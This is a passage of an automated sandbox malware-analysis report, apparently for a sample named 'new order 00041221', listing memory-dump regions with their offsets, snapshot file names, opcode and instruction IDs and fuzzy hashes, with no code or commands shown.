                                            • API String ID:
                                            • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction ID: 84dc4f6d6c83e6f283a4fae14412ef34ca62cdea1307c9cf94ba276025a38cd5
                                            • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                            • Instruction Fuzzy Hash: FF11B176505244CFCB16CF54E5C4B16BF72FB84328F2486A9DD490B297C336D45ACBA2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c91080ac816c3c26697a514b659444b66b74fa28c2729c6537dfbd5e0147b7f
                                            • Instruction ID: e9746a7885dc377e1326716a26303c2cf971fd36c187493f6372df41055ec7bc
                                            • Opcode Fuzzy Hash: 0c91080ac816c3c26697a514b659444b66b74fa28c2729c6537dfbd5e0147b7f
                                            • Instruction Fuzzy Hash: D3115E74D0021ADFEB14EFB9D544B9EBBF2FB44300F0086A9D1199B259EB706E069F81
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3709076164.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_121d000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: acb03f77ac397f711157902e8f8ae122c7e6ad81f61b8a816c1ef312117f1b13
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: 7311D075504244CFCB16CF64C5C4B15BFA2FB44314F24C6ADD9494B256C33AD44ACF51
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea818ad55184e305d1228c226bda15d860bf855766467539420a144863c434eb
                                            • Instruction ID: 75259fc58ea4a7ce62e9993330e389627fef085fe7f87f8ba4454389b24720ec
                                            • Opcode Fuzzy Hash: ea818ad55184e305d1228c226bda15d860bf855766467539420a144863c434eb
                                            • Instruction Fuzzy Hash: 700128327112166FCB52CFA89804AFF7FE7EBC9250F04C02AF505D7284DA758C168790
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33fb1a26db7e6bcac610c49cdffdae16651e42ec2375d678d916c53140fad631
                                            • Instruction ID: 8d3d2dbd32b5c6befe112ac033ebcb92f0656a9b7a43813408c037088b64d7de
                                            • Opcode Fuzzy Hash: 33fb1a26db7e6bcac610c49cdffdae16651e42ec2375d678d916c53140fad631
                                            • Instruction Fuzzy Hash: 2F116D78D0020AAFCB41DFB8E8549AEBBB1FB49300F104665E914A3354D7355915DF91
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9422df10d093317dd149245d9694aab6c51741ec4a67d4889bbd49a15994cb5
                                            • Instruction ID: dd3cc4795c4817bd27d52f5da41f9cc531e8111e9c6b856243cf07482801fd08
                                            • Opcode Fuzzy Hash: b9422df10d093317dd149245d9694aab6c51741ec4a67d4889bbd49a15994cb5
                                            • Instruction Fuzzy Hash: A9F0F6313102115B9B265A2E9458A2FBADEEFC9A7130D407EEB06CB365EE31CC028380
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f413570f6b96903d00cb1ad3ac8cccc6fa32e1de4945b7247250cc7f0f58afe4
                                            • Instruction ID: 586659de019ecfed9a8066d521476ed8abf094e1422f01971f583581e2d39879
                                            • Opcode Fuzzy Hash: f413570f6b96903d00cb1ad3ac8cccc6fa32e1de4945b7247250cc7f0f58afe4
                                            • Instruction Fuzzy Hash: B6F08C32A10218AFCF10DF69E808AEEBBF5EBC8324F00C02AE908C7214D3714A558B90
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d2ea0b4bede9b563818211801c8a2c2f3dcf2981e60b6fa2b0eb9ae1cc8715d5
                                            • Instruction ID: 756106c4fabba35a847f715a741779f6eff83dc721d9583ce295b3aa05467a11
                                            • Opcode Fuzzy Hash: d2ea0b4bede9b563818211801c8a2c2f3dcf2981e60b6fa2b0eb9ae1cc8715d5
                                            • Instruction Fuzzy Hash: CBE0DF35D54326CBC711EBB09C400EEFB34AE86321B58866BC42537190EB345669C7A1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8351f7986d47f9ee80c20893f1aeafb282d5f431699a064e5ed4b3e7d67e3062
                                            • Instruction ID: 7e64bbb4661c0c517d314be9e354e087a26b033c9064990d8b1ebada090faccd
                                            • Opcode Fuzzy Hash: 8351f7986d47f9ee80c20893f1aeafb282d5f431699a064e5ed4b3e7d67e3062
                                            • Instruction Fuzzy Hash: EDE0C2304483229FCB93ABB0E8044E93F76AB8212070087A1E4014E15EDBB45C4ECB21
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c136f867ce349979073310a5262657c6e13693d20260a604b8a888be2199afd
                                            • Instruction ID: 37566068d83185f0e4326393310b650fe23c4ddc421d9b9b98e4168d4d22c869
                                            • Opcode Fuzzy Hash: 7c136f867ce349979073310a5262657c6e13693d20260a604b8a888be2199afd
                                            • Instruction Fuzzy Hash: 7AD05B31D2032A57CB10E7A5DC048DFFB38EED6321B904626D52437144FB706659C6E1
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction ID: 17f2bf72fba5baf27ad71e17f23193fe14cf8bcf8a90a73ae941b19530a785d4
                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                            • Instruction Fuzzy Hash: 7EC08C3361C1282BA235104E7C49EB3BB8DC3C23B4BA10137FB1CD3200AC929C8001FA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ab0c6a651230b2410571c2893420a2ccd9d561e03a8e3c30b76ea75737fffa9
                                            • Instruction ID: 64a10ada50c7786d13c4e58375336aa494522e2898cacddfcc62955ca54235b6
                                            • Opcode Fuzzy Hash: 0ab0c6a651230b2410571c2893420a2ccd9d561e03a8e3c30b76ea75737fffa9
                                            • Instruction Fuzzy Hash: 7CD0673AB00008DFCB149F98E8449DDF7B6FB98221B448116E915A7264C6319965DB64
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8525bbd01aad4137e9159a9959d1c64102e4f336c19535bc78c8dfbf9e557433
                                            • Instruction ID: 1a849493cc556cb2d4b2af53b1de216a8c2c4226d719b7cf515eb31b2c9769eb
                                            • Opcode Fuzzy Hash: 8525bbd01aad4137e9159a9959d1c64102e4f336c19535bc78c8dfbf9e557433
                                            • Instruction Fuzzy Hash: 55C012345003254FDA51F766FC4456A376AA7D01017408B20A0050D24EDF74284E5795
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .5r
                                            • API String ID: 0-750816051
                                            • Opcode ID: 03a9c75def3ae7953be29cf7e9c8234f786af2dd7ae5ff971de45751d5a48a78
                                            • Instruction ID: 5218380383ec4e4b700774833f628e35d7a1dabd6fcf993eb8fe5c6e391b6c62
                                            • Opcode Fuzzy Hash: 03a9c75def3ae7953be29cf7e9c8234f786af2dd7ae5ff971de45751d5a48a78
                                            • Instruction Fuzzy Hash: 6552AD74E01229CFDB64DF69C984B9EBBB2BB89304F1085E9E409A7354DB319E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d34523f0838b2268d8797e707870f056aec688610afeabf0bef7effc0ad7c15b
                                            • Instruction ID: d55a699bc904b239c23e326c7b22d1121b65ded9fe983dc5bb65028032c9514c
                                            • Opcode Fuzzy Hash: d34523f0838b2268d8797e707870f056aec688610afeabf0bef7effc0ad7c15b
                                            • Instruction Fuzzy Hash: A472CE74E042288FDB64DF69C985BEDBBB2BB49304F1481E9E409A7355DB30AE81CF40
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf2085979676164f555c96a99fb550afc19e0dbe3ba2eb72ec9ec786ba32faf5
                                            • Instruction ID: 3ed7d8a8a943dc4311a8c2a5e875ead4c864fd4c407c22efef903d9ae907ad1a
                                            • Opcode Fuzzy Hash: bf2085979676164f555c96a99fb550afc19e0dbe3ba2eb72ec9ec786ba32faf5
                                            • Instruction Fuzzy Hash: 29C1B474E00218CFDB14DFA5C954BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a811fdc480e41db03121790cf3e076c96ba15796e1e82afa4fb48a4fe092b141
                                            • Instruction ID: e8c7ac6cff67901bc39e55ebdf23c76354755df12c74ad2c25469de1506eeed8
                                            • Opcode Fuzzy Hash: a811fdc480e41db03121790cf3e076c96ba15796e1e82afa4fb48a4fe092b141
                                            • Instruction Fuzzy Hash: BAC1A278E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c19ae8755e316630b671d8f3a48e622f1e9e2323eb13f2f03823d5687db7c756
                                            • Instruction ID: c347ffe1aaf14101e5bf6f9d2d4fc22edf8d638cb844fbf62499a7c76ef62581
                                            • Opcode Fuzzy Hash: c19ae8755e316630b671d8f3a48e622f1e9e2323eb13f2f03823d5687db7c756
                                            • Instruction Fuzzy Hash: C7C1B278E00218CFDB54DFA5C994BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eda1ea47635e14b02284b447e784e968eaec3b86c78e672b5e4f355cf88756fe
                                            • Instruction ID: 3dfd51c935f4e7fc916f63f3915f8791dcfeb24d567fb0c02fad91da18983977
                                            • Opcode Fuzzy Hash: eda1ea47635e14b02284b447e784e968eaec3b86c78e672b5e4f355cf88756fe
                                            • Instruction Fuzzy Hash: 5FC1C278E00218CFDB24DFA5D954B9DBBB2BF88305F2081A9D819AB354DB355E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a7e1b2bb516c80f4a7b3c514466ff775f4a566e5099ef327c3e4c3bdb9b171f
                                            • Instruction ID: 561f0009e6a577671944f3faba2a0cb9a61412d50de62805c7f60e7ada7a4393
                                            • Opcode Fuzzy Hash: 0a7e1b2bb516c80f4a7b3c514466ff775f4a566e5099ef327c3e4c3bdb9b171f
                                            • Instruction Fuzzy Hash: A8C1A278E00218CFDB14DFA5D954BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 94027cc53e8721c0e6acd2e99b9aa3a89804b825a21a6bafe94f429483f3e410
                                            • Instruction ID: 9ce560a738ae05b5f1bb2c0ac5ce30f7ceb816ec8a88868bcbe21d0ad1f9e6ea
                                            • Opcode Fuzzy Hash: 94027cc53e8721c0e6acd2e99b9aa3a89804b825a21a6bafe94f429483f3e410
                                            • Instruction Fuzzy Hash: 83C1B278E01218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7100d0c621be6d4e048fb07a5e0efd234438c315a86f7ca46947e98e10459bc9
                                            • Instruction ID: a68525bdf116d34530fbba12fa765a6bffac2f54caf5cb0ef8500e7ac815a695
                                            • Opcode Fuzzy Hash: 7100d0c621be6d4e048fb07a5e0efd234438c315a86f7ca46947e98e10459bc9
                                            • Instruction Fuzzy Hash: C4C1B378E00218CFDB14DFA5C954BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04db2e7ca7410a739569769581d7821ace878804b346077503dbac3b4256208b
                                            • Instruction ID: 22f4c67fe8b4136ecc7f0704c9c94355084eb034ae9b41436f81e13cdc49eb7a
                                            • Opcode Fuzzy Hash: 04db2e7ca7410a739569769581d7821ace878804b346077503dbac3b4256208b
                                            • Instruction Fuzzy Hash: 8FC1A278E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d79bbbba0a0f59b1be43f88d2f1fff5823ebe7bf52a9ddf9c02e876adb7c2ed8
                                            • Instruction ID: fb7253bf77b5671bb7d09c1585c701e37988c6448ce84bd1a65dc5a0a5d7f5fb
                                            • Opcode Fuzzy Hash: d79bbbba0a0f59b1be43f88d2f1fff5823ebe7bf52a9ddf9c02e876adb7c2ed8
                                            • Instruction Fuzzy Hash: 5DC1B378E00218CFDB14DFA5D954BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66274e466c396398f06858f3893c8c60bd2bacb2972489132f6f4595c64390b3
                                            • Instruction ID: 8deeb0d5831153cd40048c23233b607064bc637e144f5482ec4206fe15a9ecc0
                                            • Opcode Fuzzy Hash: 66274e466c396398f06858f3893c8c60bd2bacb2972489132f6f4595c64390b3
                                            • Instruction Fuzzy Hash: 9EC1A178E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 71fa76c250eb7aacd2e69e0905efd0c435ce806a35bb5d544ef88feccb07b750
                                            • Instruction ID: 0e49d2c18b5273e5e2ceba413ea4fd864ecea430a48ea17fa83fb93d9a79bb1b
                                            • Opcode Fuzzy Hash: 71fa76c250eb7aacd2e69e0905efd0c435ce806a35bb5d544ef88feccb07b750
                                            • Instruction Fuzzy Hash: 05C1B378E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ccd07f913c85438734120b2559d0ae995d408d17061b266f510563dd08c109fb
                                            • Instruction ID: 0c62e5601445ef7cef88ea940b419d69f8d50fe0469cab6f9a17731242513b43
                                            • Opcode Fuzzy Hash: ccd07f913c85438734120b2559d0ae995d408d17061b266f510563dd08c109fb
                                            • Instruction Fuzzy Hash: E0C1B278E00218CFDB14DFA5D994BADBBB2BF89304F2081A9D419AB354DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51b6c6d6075d563e37d80ce9e3ab46d020690e96c40f5b13dc72f0f9e2551df8
                                            • Instruction ID: 49066fd92bc5fefcc4d25fa1c8cd26c532074e67e51274f7d044942252d474d6
                                            • Opcode Fuzzy Hash: 51b6c6d6075d563e37d80ce9e3ab46d020690e96c40f5b13dc72f0f9e2551df8
                                            • Instruction Fuzzy Hash: D4C1B378E00218CFDB14DFA5C954BADBBB2BF89304F2081A9D419AB355DB359E85CF50
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02fd121b3cfdaddb7543902b17584e5fc96f72f3f7f81ff4263e1b3ca1a07db5
                                            • Instruction ID: c9c1a285aed1c31a97370def8b7bd1ce27888dc31dbaf4d0f3e351a4c4673e6e
                                            • Opcode Fuzzy Hash: 02fd121b3cfdaddb7543902b17584e5fc96f72f3f7f81ff4263e1b3ca1a07db5
                                            • Instruction Fuzzy Hash: 70A11674D00208CFEB24DFA9C945B9DBBB1FF88304F20826AE409AB391DB759985CF55
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51718158846c44f23518ffa4af0c0cc389660d82a431143a3175e88e9a3c0fe8
                                            • Instruction ID: 09691a59ba01c66d0aee0300fea5fedd9bbdcd7a58eed2cb26f8532ce9fe0eef
                                            • Opcode Fuzzy Hash: 51718158846c44f23518ffa4af0c0cc389660d82a431143a3175e88e9a3c0fe8
                                            • Instruction Fuzzy Hash: 36A11674D00208CFEB24DFA9C945B9DBBB1FF48304F20826AE419AB3A1DB759985CF55
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9714dc09755f7bcc09ac40b27c1b8b083be86d878109da6dd0ff77a9119101e1
                                            • Instruction ID: e99dbaeb9bc19471397b274f05c6f854432a19c0d0d555c4f8ac155cd838a6b7
                                            • Opcode Fuzzy Hash: 9714dc09755f7bcc09ac40b27c1b8b083be86d878109da6dd0ff77a9119101e1
                                            • Instruction Fuzzy Hash: 4B910374D04208CFEB10DFA9C989B9CBBF1FF49314F20826AE409AB291DB759985CF55
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 764326fb22ebefc56483defedc796c88e68354084f581bde2a91b121e6266193
                                            • Instruction ID: 9ae2c262a52a8dfaba5f23f18d89a972d8697ea70b20570b3cf6839242d51159
                                            • Opcode Fuzzy Hash: 764326fb22ebefc56483defedc796c88e68354084f581bde2a91b121e6266193
                                            • Instruction Fuzzy Hash: FEA19B74E01228CFDB65DF24C894BAABBB2BF49301F5085EAE409A7350DB319E81CF51
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a8b224be3ad430718e818ae25c6952b3445d591767cdc32587c495be62050ec
                                            • Instruction ID: d9db00367e240e1dd1e765f386b642268d6ff13728ab2fae552b7d83f794eade
                                            • Opcode Fuzzy Hash: 5a8b224be3ad430718e818ae25c6952b3445d591767cdc32587c495be62050ec
                                            • Instruction Fuzzy Hash: 3D515674D15209CFEB04EFA9D6487EEBBB2FF89300F248229D410AB298D7759985CF54
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3710367617.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1270000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 75db9733ead541970a93f5e9ffaa7beb5d6b36c444ec49290be7f7d095746ca2
                                            • Instruction ID: 293e080a813690fa59e8c3f43278ed240c0f9ef1bcd087caef5d4191571fab99
                                            • Opcode Fuzzy Hash: 75db9733ead541970a93f5e9ffaa7beb5d6b36c444ec49290be7f7d095746ca2
                                            • Instruction Fuzzy Hash: 02513634D29209CFDB10EFA8D6887EEBBB1FF49300F648219D425AB284D7759981CF54
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3716159141.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_5a30000_new order 00041221.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e293ba93b55e5769d5d0f9e8ed4f25e7b0498f303e637d119b008b32b6d7e922
                                            • Instruction ID: 2d3560c2edd61250be438678718e21d6e554877326236883a9c282835a15cca7
                                            • Opcode Fuzzy Hash: e293ba93b55e5769d5d0f9e8ed4f25e7b0498f303e637d119b008b32b6d7e922
                                            • Instruction Fuzzy Hash: A1519474A01229DFCB65DF24D854BA9BBB2FF49301F5085EAE40AA7354DB31AE81CF50